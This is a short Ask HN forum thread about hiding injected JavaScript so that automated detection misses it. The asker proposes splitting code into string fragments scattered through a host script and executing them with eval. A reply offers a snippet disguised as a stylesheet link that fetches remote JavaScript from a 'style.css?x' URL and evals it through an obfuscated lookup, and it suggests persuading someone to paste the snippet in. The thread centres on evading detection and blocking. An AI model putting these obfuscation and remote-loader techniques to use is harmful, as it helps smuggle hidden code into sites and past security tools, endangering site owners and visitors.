Ask HN: How to inject code within a js so that it cannot be auto detected

[victorpopescu]

I have a piece of code (a) which i would like to inject in an existing piece of code (b). I would not like this injection to be auto detected. It is assumed that (b) is always subject to change

My approach was to create a random var (x) which would have the code (a) split and concatenated in random locations within (b)

For example:

Var x="var code=fu";{random piece of (b)};x+="nction(";{random piece of (b)};x+="){}";{random piece of (b)};eval(x);{random piece of (b)}

1. Would you approach this problem differently? 2. How would you detect for root-level code within (b) - aka random locations outside loops or functions

[zachrose]

Assuming this is JavaScript in a browser, I guess it depends on who you're trying to fool. It sounds like your going for obfuscated or "underhanded" code.

Just messing around, here's something you might try. You might convince someone to paste in a CSS link and an obscure but short snippet of JavaScript. (Okay!) Then:

    <link rel="stylesheet" href="//your.domain/style.css" id="ok"></link>
    <script>var s = function(k){return k.split('')};
    var obj = Object.keys({value:3}).map(s);
    fetch(document.getElementById('ok').href+"?x").then(r){r.text().then(window[obj[0].pop().concat(obj[0].join('')).split('');s.pop();
    s.join('');]})</script>

Serve a stylesheet at your.domain/style.css and serve JavaScript at your.domain/style.css?x. The JS here will fetch that as text and eval it.

[victorpopescu]

But this could be auto blocked by blocking style.css.

My assumption is that i am in control of both (a) and (b) so i can mess around with the output of (b) to have all of (a) within itself.

The problem is how to best inject (a) inside (b), without using any 3rd party resources, which could be blocked automatically